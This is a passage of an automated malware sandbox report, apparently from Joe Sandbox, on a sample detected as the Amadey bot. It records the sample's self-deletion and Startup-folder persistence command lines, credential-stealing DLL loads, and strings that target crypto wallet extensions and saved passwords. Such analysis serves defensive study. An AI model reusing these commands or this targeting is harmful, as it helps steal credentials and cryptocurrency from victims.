                                                                                                                                          Commandline:'C:\Windows\System32\cmd.exe' /c taskkill /im wKYTg7Gp6P.exe /f & timeout /t 6 & del /f /q 'C:\Users\user\Desktop\wKYTg7Gp6P.exe' & del C:\ProgramData\*.dll & exit
                                                                                                                                          Imagebase:0x11d0000
                                                                                                                                          File size:232960 bytes
                                                                                                                                          MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:high

                                                                                                                                          General

                                                                                                                                          Start time:22:58:58
                                                                                                                                          Start date:28/04/2021
                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                          Imagebase:0x7ff724c50000
                                                                                                                                          File size:625664 bytes
                                                                                                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:high

                                                                                                                                          General

                                                                                                                                          Start time:22:58:58
                                                                                                                                          Start date:28/04/2021
                                                                                                                                          Path:C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:taskkill /im wKYTg7Gp6P.exe /f
                                                                                                                                          Imagebase:0xf00000
                                                                                                                                          File size:74752 bytes
                                                                                                                                          MD5 hash:15E2E0ACD891510C6268CB8899F2A1A1
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:high

                                                                                                                                          General

                                                                                                                                          Start time:22:58:59
                                                                                                                                          Start date:28/04/2021
                                                                                                                                          Path:C:\Windows\SysWOW64\timeout.exe
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:timeout /t 6
                                                                                                                                          Imagebase:0x1360000
                                                                                                                                          File size:26112 bytes
                                                                                                                                          MD5 hash:121A4EDAE60A7AF6F5DFA82F7BB95659
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:high

                                                                                                                                          General

                                                                                                                                          Start time:22:59:03
                                                                                                                                          Start date:28/04/2021
                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:'C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe'
                                                                                                                                          Imagebase:0x400000
                                                                                                                                          File size:290304 bytes
                                                                                                                                          MD5 hash:31AB82365078548DCEA62DA7C2380B2E
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Yara matches:
                                                                                                                                          • Rule: JoeSecurity_Amadey, Description: Yara detected Amadey bot, Source: 0000000A.00000002.923993621.00000000006DF000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                          Antivirus matches:
                                                                                                                                          • Detection: 100%, Joe Sandbox ML
                                                                                                                                          Reputation:low

                                                                                                                                          General

                                                                                                                                          Start time:22:59:09
                                                                                                                                          Start date:28/04/2021
                                                                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:'C:\Windows\System32\cmd.exe' /C REG ADD 'HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders' /f /v Startup /t REG_SZ /d C:\Users\user\AppData\Local\Temp\e90e419c61\
                                                                                                                                          Imagebase:0x11d0000
                                                                                                                                          File size:232960 bytes
                                                                                                                                          MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:high

                                                                                                                                          General

                                                                                                                                          Start time:22:59:09
                                                                                                                                          Start date:28/04/2021
                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                          Imagebase:0x7ff724c50000
                                                                                                                                          File size:625664 bytes
                                                                                                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:high

                                                                                                                                          General

                                                                                                                                          Start time:22:59:09
                                                                                                                                          Start date:28/04/2021
                                                                                                                                          Path:C:\Windows\SysWOW64\reg.exe
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:REG ADD 'HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders' /f /v Startup /t REG_SZ /d C:\Users\user\AppData\Local\Temp\e90e419c61\
                                                                                                                                          Imagebase:0xcb0000
                                                                                                                                          File size:59392 bytes
                                                                                                                                          MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:high

                                                                                                                                          General

                                                                                                                                          Start time:22:59:20
                                                                                                                                          Start date:28/04/2021
                                                                                                                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:'C:\Windows\System32\rundll32.exe' C:\ProgramData\1a9f26b569d5df\cred.dll, Main
                                                                                                                                          Imagebase:0xa0000
                                                                                                                                          File size:61952 bytes
                                                                                                                                          MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:Borland Delphi
                                                                                                                                          Reputation:high

                                                                                                                                          General

                                                                                                                                          Start time:22:59:30
                                                                                                                                          Start date:28/04/2021
                                                                                                                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:'C:\Windows\System32\rundll32.exe' C:\ProgramData\1a9f26b569d5df\scr.dll, Main
                                                                                                                                          Imagebase:0xa0000
                                                                                                                                          File size:61952 bytes
                                                                                                                                          MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:Borland Delphi
                                                                                                                                          Reputation:high

                                                                                                                                          Disassembly

                                                                                                                                          Code Analysis

                                                                                                                                            Executed Functions

                                                                                                                                            APIs
                                                                                                                                            • __EH_prolog3.LIBCMT ref: 00404924
                                                                                                                                            • _memset.LIBCMT ref: 00404953
                                                                                                                                            • _memset.LIBCMT ref: 00404966
                                                                                                                                            • _memset.LIBCMT ref: 00404974
                                                                                                                                            • _memset.LIBCMT ref: 00404982
                                                                                                                                            • lstrcpyW.KERNEL32(?,?), ref: 00404992
                                                                                                                                            • lstrcatW.KERNEL32(?,\*.*), ref: 004049A4
                                                                                                                                            • FindFirstFileW.KERNELBASE(?,00000000,?,?,?,?,?,?,?,?,?,?,?,00000018), ref: 004049B5
                                                                                                                                            • lstrcpyW.KERNEL32(?,?), ref: 004049C8
                                                                                                                                            • lstrcatW.KERNEL32(?,00481858), ref: 004049DB
                                                                                                                                            • lstrcatW.KERNEL32(?,?), ref: 004049EC
                                                                                                                                            • lstrcpyW.KERNEL32(?,?), ref: 004049FC
                                                                                                                                            • lstrcatW.KERNEL32(?,00481858), ref: 00404A10
                                                                                                                                            • lstrcatW.KERNEL32(?,?), ref: 00404A1D
                                                                                                                                            • lstrcmpW.KERNEL32(?,00481854,?,?,?,?,?,?,?,?,?,?,?,00000018), ref: 00404A34
                                                                                                                                            • lstrcmpW.KERNEL32(?,0048184C,?,?,?,?,?,?,?,?,?,?,?,00000018), ref: 00404A47
                                                                                                                                            • PathMatchSpecW.SHLWAPI(?,00000000,00000001,00000000,?), ref: 00404B12
                                                                                                                                            • PathMatchSpecW.SHLWAPI(?,00000000), ref: 00404F0E
                                                                                                                                              • Part of subcall function 004028A4: _memmove.LIBCMT ref: 004028C6
                                                                                                                                              • Part of subcall function 0045D04F: CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0045D06A
                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00404F43
                                                                                                                                              • Part of subcall function 0045EBF9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0045EC2A
                                                                                                                                              • Part of subcall function 0045EBF9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 0045EC4D
                                                                                                                                            • FindNextFileW.KERNELBASE(?,00000000,00000001,00000000), ref: 0040506C
                                                                                                                                            • FindClose.KERNEL32(?), ref: 0040507D
                                                                                                                                            • _memset.LIBCMT ref: 0040508D
                                                                                                                                            • _memset.LIBCMT ref: 0040509B
                                                                                                                                            • _memset.LIBCMT ref: 004050A9
                                                                                                                                            • _memset.LIBCMT ref: 004050B7
                                                                                                                                            • _memset.LIBCMT ref: 00405108
                                                                                                                                            • _memset.LIBCMT ref: 00405116
                                                                                                                                            • _memset.LIBCMT ref: 00405124
                                                                                                                                            • _memset.LIBCMT ref: 00405132
                                                                                                                                            • FindClose.KERNEL32(00000008), ref: 0040513D
                                                                                                                                              • Part of subcall function 00404905: DeleteFileW.KERNEL32(?,00000001,00000000,00000001,00000000,00000001,00000000,00000001,00000000,?,00000001,00000000), ref: 00404C19
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _memset$lstrcat$FileFind$lstrcpy$ByteCharCloseMatchMultiPathSpecWidelstrcmp$CreateDeleteFirstH_prolog3NextUnothrow_t@std@@@__ehfuncinfo$??2@_memmove
                                                                                                                                            • String ID: \*.*
                                                                                                                                            • API String ID: 2798174453-1173974218
                                                                                                                                            • Opcode ID: a1b104165f90e88d391731eca65dee25fcaee8f7f46ddfb891e8c10f64540eb8
                                                                                                                                            • Instruction ID: 7e951b701872478bf3f71432b7157aed566a783cad06ae2a4b03e78ec1401cc7
                                                                                                                                            • Opcode Fuzzy Hash: a1b104165f90e88d391731eca65dee25fcaee8f7f46ddfb891e8c10f64540eb8
                                                                                                                                            • Instruction Fuzzy Hash: 003239B1401189AEDF21EF90DC88EEE777CFF54309F14053BE909A6191EB399A44CB69
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • __EH_prolog3.LIBCMT ref: 00405456
                                                                                                                                            • _sprintf.LIBCMT ref: 0040547F
                                                                                                                                            • FindFirstFileA.KERNELBASE(?,00000000,?,?,00000018), ref: 00405492
                                                                                                                                            • _sprintf.LIBCMT ref: 004054E1
                                                                                                                                              • Part of subcall function 004658EA: __output_l.LIBCMT ref: 00465945
                                                                                                                                              • Part of subcall function 00405156: __EH_prolog3.LIBCMT ref: 00405175
                                                                                                                                              • Part of subcall function 00405156: _sprintf.LIBCMT ref: 004051B1
                                                                                                                                              • Part of subcall function 00405156: FindFirstFileA.KERNEL32(?,00000000,?,?,00000014), ref: 004051C4
                                                                                                                                              • Part of subcall function 004025E8: _memmove.LIBCMT ref: 00402607
                                                                                                                                              • Part of subcall function 00402CCF: _memmove.LIBCMT ref: 00402D20
                                                                                                                                              • Part of subcall function 00405156: _sprintf.LIBCMT ref: 0040522A
                                                                                                                                              • Part of subcall function 00405156: CopyFileA.KERNEL32 ref: 004053AE
                                                                                                                                              • Part of subcall function 00405156: FindNextFileA.KERNEL32(?,00000000,?,?,00000014), ref: 004053DF
                                                                                                                                              • Part of subcall function 00405156: FindClose.KERNEL32(?,?,?,00000014), ref: 004053F0
                                                                                                                                            • FindNextFileA.KERNELBASE(?,00000000,?,?,00000018), ref: 00406536
                                                                                                                                            • FindClose.KERNEL32(?,?,?,00000018), ref: 00406547
                                                                                                                                            Strings
                                                                                                                                            • \Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp, xrefs: 004059DB
                                                                                                                                            • %s\%s, xrefs: 004054DB
                                                                                                                                            • Wallets, xrefs: 0040569E, 004058A0, 00405AA2, 00405CA4, 00405EA6, 004060A8
                                                                                                                                            • BinanceChainWallet, xrefs: 00405A81, 00406087
                                                                                                                                            • \Sync Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec, xrefs: 00405BDD
                                                                                                                                            • TronLink, xrefs: 0040567D, 00405C83
                                                                                                                                            • \Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai\CURRENT, xrefs: 004062FF
                                                                                                                                            • MetaMask, xrefs: 0040587F, 00405E85
                                                                                                                                            • \Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai\CURRENT, xrefs: 004060FD
                                                                                                                                            • \Sync Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn, xrefs: 00405DDF
                                                                                                                                            • %s\*, xrefs: 00405474
                                                                                                                                            • Plugins, xrefs: 004062AA, 004064AC
                                                                                                                                            • \Sync Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn\CURRENT, xrefs: 00405CF9
                                                                                                                                            • \Sync Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp\CURRENT, xrefs: 00405EFB
                                                                                                                                            • \Sync Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec\CURRENT, xrefs: 00405AF7
                                                                                                                                            • \Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai, xrefs: 004063E5
                                                                                                                                            • \Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec\CURRENT, xrefs: 004054EE
                                                                                                                                            • \Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn\CURRENT, xrefs: 004056F3
                                                                                                                                            • \Sync Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp, xrefs: 00405FE1
                                                                                                                                            • \Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp\CURRENT, xrefs: 004058F5
                                                                                                                                            • \Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec, xrefs: 004055D7
                                                                                                                                            • \Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn, xrefs: 004057D9
                                                                                                                                            • \Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai, xrefs: 004061E3
                                                                                                                                            • Authenticator, xrefs: 00406289, 0040648B
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Find$File$_sprintf$CloseFirstH_prolog3Next_memmove$Copy__output_l
                                                                                                                                            • String ID: %s\%s$%s\*$Authenticator$BinanceChainWallet$MetaMask$Plugins$TronLink$Wallets$\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai$\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai\CURRENT$\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp$\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp\CURRENT$\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec$\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec\CURRENT$\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn$\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn\CURRENT$\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai$\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai\CURRENT$\Sync Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp$\Sync Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp\CURRENT$\Sync Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec$\Sync Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec\CURRENT$\Sync Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn$\Sync Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn\CURRENT
                                                                                                                                            • API String ID: 4158272174-3778960471
                                                                                                                                            • Opcode ID: 13287aae50373c5713009a8c0f6b830647efe450f876ad715b8526480c75b18e
                                                                                                                                            • Instruction ID: 8fc455913da9e46366c38a0d3bffcb6f635551091eb70b688b8786d60db2637e
                                                                                                                                            • Opcode Fuzzy Hash: 13287aae50373c5713009a8c0f6b830647efe450f876ad715b8526480c75b18e
                                                                                                                                            • Instruction Fuzzy Hash: 6CB262B140418CEEEF25EF64CD59EDE3BB8AF15308F10416FE909AB291DA745B08CB65
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • LoadLibraryA.KERNEL32(00000001,?,?,00000000,00407555), ref: 0045F4B2
                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0045F4CB
                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0045F4D9
                                                                                                                                            • LoadLibraryA.KERNEL32(?,?,00000000,00407555), ref: 0045F4E6
                                                                                                                                            • LoadLibraryA.KERNEL32(?,?,00000000,00407555), ref: 0045F4F4
                                                                                                                                            • LoadLibraryA.KERNEL32(?,?,00000000,00407555), ref: 0045F502
                                                                                                                                            • LoadLibraryA.KERNEL32(?,?,00000000,00407555), ref: 0045F510
                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0045F523
                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0045F535
                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0045F547
                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0045F559
                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0045F56B
                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0045F57D
                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0045F593
                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0045F5A5
                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0045F5BF
                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0045F5D1
                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0045F5E3
                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0045F5F5
                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0045F607
                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0045F619
                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0045F62B
                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0045F63D
                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0045F64F
                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0045F669
                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0045F67B
                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0045F68D
                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0045F69F
                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0045F6B1
                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0045F6C3
                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0045F6D5
                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0045F6E7
                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0045F6F9
                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0045F70B
                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0045F71D
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AddressProc$LibraryLoad
                                                                                                                                            • String ID:
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • _strtok.LIBCMT ref: 0040697B
                                                                                                                                            • _strtok.LIBCMT ref: 00406A3D
                                                                                                                                              • Part of subcall function 00404872: __EH_prolog3.LIBCMT ref: 00404879
                                                                                                                                              • Part of subcall function 00403FCA: _memmove.LIBCMT ref: 00403FEC
                                                                                                                                              • Part of subcall function 004025E8: _memmove.LIBCMT ref: 00402607
                                                                                                                                            • __wgetenv.LIBCMT ref: 00406BA3
                                                                                                                                            • __wgetenv.LIBCMT ref: 00406C41
                                                                                                                                            • GetLogicalDriveStringsA.KERNEL32 ref: 00406E82
                                                                                                                                            • _strtok.LIBCMT ref: 00406EB7
                                                                                                                                            • GetDriveTypeA.KERNEL32(?,00000001,00000000), ref: 00406F1D
                                                                                                                                              • Part of subcall function 0045C174: GetUserNameA.ADVAPI32(?,?), ref: 0045C1A9
                                                                                                                                              • Part of subcall function 0045F006: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 0045F035
                                                                                                                                              • Part of subcall function 0045F006: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 0045F064
                                                                                                                                            • _strtok.LIBCMT ref: 004072F4
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _strtok$ByteCharDriveMultiWide__wgetenv_memmove$H_prolog3LogicalNameStringsTypeUser
                                                                                                                                            • String ID: %APPDATA%$%C%$%DESKTOP%$%DOCUMENTS%$%DRIVE_FIXED%$%DRIVE_REMOVABLE%$%LOCALAPPDATA%$.zip$APPDATA$C:\$C:\Users\$LOCALAPPDATA$\Desktop$\Documents
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • LoadLibraryA.KERNEL32(?,00000000), ref: 0040EBD9
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,004940CC), ref: 0040EBFA
                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0040EC08
                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0040EC16
                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0040EC24
                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0040EC32
                                                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000100,00000000,00000000,00000001,00000000,passwords.txt,?,00000000), ref: 0040ED41
                                                                                                                                            • _fprintf.LIBCMT ref: 0040ED52
                                                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,-00000010,000000FF,?,00000100,00000000,00000000,?,?,00000000), ref: 0040ED6F
                                                                                                                                            • _fprintf.LIBCMT ref: 0040ED7D
                                                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000100,00000000,00000000,?,?,?,?,?,00000000), ref: 0040ED9D
                                                                                                                                            • _fprintf.LIBCMT ref: 0040EDAE
                                                                                                                                            • _fprintf.LIBCMT ref: 0040EDDF
                                                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000100,00000000,00000000), ref: 0040EE00
                                                                                                                                            • _fprintf.LIBCMT ref: 0040EE11
                                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,00000000), ref: 0040EE6F
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AddressProc_fprintf$ByteCharMultiWide$Library$FreeLoad
                                                                                                                                            • String ID: Host: %s$Login: %s$Password: $Password: %s$Soft: %s$passwords.txt
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • __EH_prolog3.LIBCMT ref: 0040F9B7
                                                                                                                                              • Part of subcall function 004046E9: __EH_prolog3.LIBCMT ref: 004046F0
                                                                                                                                            • __wgetenv.LIBCMT ref: 0040F9FD
                                                                                                                                            • _sprintf.LIBCMT ref: 0040FA38
                                                                                                                                            • FindFirstFileA.KERNELBASE(?,00000000,?,?,00000000), ref: 0040FA4B
                                                                                                                                            • _sprintf.LIBCMT ref: 0040FA9B
                                                                                                                                              • Part of subcall function 004658EA: __output_l.LIBCMT ref: 00465945
                                                                                                                                            • _sprintf.LIBCMT ref: 0040FAC4
                                                                                                                                              • Part of subcall function 004658EA: __flsbuf.LIBCMT ref: 00465960
                                                                                                                                            • _sprintf.LIBCMT ref: 0040FAD3
                                                                                                                                            • PathMatchSpecA.SHLWAPI(?,00000010,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040FAE2
                                                                                                                                            • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 0040FB2A
                                                                                                                                            • CopyFileA.KERNEL32 ref: 0040FB91
                                                                                                                                            • FindNextFileA.KERNEL32(?,00000000,?,?,00000000), ref: 0040FBD5
                                                                                                                                            • FindClose.KERNEL32(?,?,?,00000000), ref: 0040FBE6
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _sprintf$FileFind$H_prolog3$CloseCopyCreateDirectoryFirstMatchNextPathSpec__flsbuf__output_l__wgetenv
                                                                                                                                            • String ID: %s\%s$%s\*
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • __EH_prolog3.LIBCMT ref: 0040659D
                                                                                                                                            • _sprintf.LIBCMT ref: 004065CE
                                                                                                                                            • FindFirstFileA.KERNELBASE(?,00000000,?,?,00000014), ref: 004065E1
                                                                                                                                            • _sprintf.LIBCMT ref: 00406631
                                                                                                                                              • Part of subcall function 004658EA: __output_l.LIBCMT ref: 00465945
                                                                                                                                            • _sprintf.LIBCMT ref: 0040665A
                                                                                                                                              • Part of subcall function 004658EA: __flsbuf.LIBCMT ref: 00465960
                                                                                                                                            • _sprintf.LIBCMT ref: 00406669
                                                                                                                                            • PathMatchSpecA.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000014), ref: 00406678
                                                                                                                                            • CopyFileA.KERNEL32 ref: 004066FC
                                                                                                                                            • FindNextFileA.KERNEL32(?,00000000,?,?,00000014), ref: 0040675E
                                                                                                                                            • FindClose.KERNEL32(?,?,?,00000014), ref: 0040676F
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _sprintf$FileFind$CloseCopyFirstH_prolog3MatchNextPathSpec__flsbuf__output_l
                                                                                                                                            • String ID: %s\%s$%s\*
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • __EH_prolog3.LIBCMT ref: 0040A93A
                                                                                                                                            • InternetSetFilePointer.WININET(?,00000000,00000000,00000000,00000000), ref: 0040A974
                                                                                                                                            • InternetReadFile.WININET(?,?,000003E8,?), ref: 0040A98E
                                                                                                                                            • _memmove.LIBCMT ref: 0040A9C3
                                                                                                                                            • _memset.LIBCMT ref: 0040A9F4
                                                                                                                                            • HttpQueryInfoA.WININET(?,0000001D,00000010,?,00000000), ref: 0040AA0A
                                                                                                                                            • CoCreateInstance.OLE32(0048C204,00000000,00000001,0048C214,?), ref: 0040AA2F
                                                                                                                                            • _memcpy_s.LIBCMT ref: 0040AB39
                                                                                                                                            • _memcpy_s.LIBCMT ref: 0040AB61
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: FileInternet_memcpy_s$CreateH_prolog3HttpInfoInstancePointerQueryRead_memmove_memset
                                                                                                                                            • String ID: text
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • __EH_prolog3_GS.LIBCMT ref: 004044D5
                                                                                                                                            • InternetOpenA.WININET(00000000,00000000,00000000,00000000,00000814), ref: 004044FB
                                                                                                                                            • InternetConnectA.WININET(?,?,000001BB,00000000,00000000,00000003,00800000,00000001), ref: 00404532
                                                                                                                                            • HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,00000000,00800000,00000001), ref: 0040455B
                                                                                                                                            • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040456C
                                                                                                                                            • InternetReadFile.WININET(00000000,?,000007FF,?), ref: 0040459E
                                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 004045A9
                                                                                                                                            • InternetCloseHandle.WININET(?), ref: 004045B5
